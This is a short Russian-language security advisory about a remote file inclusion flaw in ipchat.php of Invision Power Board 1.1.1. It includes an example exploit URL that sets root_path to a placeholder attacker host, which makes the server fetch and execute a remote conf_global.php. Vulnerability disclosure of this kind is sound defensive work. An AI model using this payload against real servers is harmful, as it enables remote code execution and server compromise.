Security Lab

Выполнение произвольных команд в Invision Power Board

Дата публикации:04.03.2003
Дата изменения:17.10.2006
Всего просмотров:2590
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Уязвимость включения файла обнаружена в Invision Power Board. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на уязвимом сервере.

Сценарий 'ipchat.php' включает файл conf_global.php через переменную $root_path, но не проверяет правильность местоположения файла.

Удаленный пользователь может определить удаленное местоположение для $root_path переменной, чтобы включить удаленно расположенный файл conf_global.php, который будет выполнен на целевом сервере. Пример:

http://[target]/ipchat.php?root_path=http://[attacker]/

http://[attacker]/conf_global.php
Уязвимость обнаружена в Invision Power Board 1.1.1
Ссылки: Invision Power Board (PHP)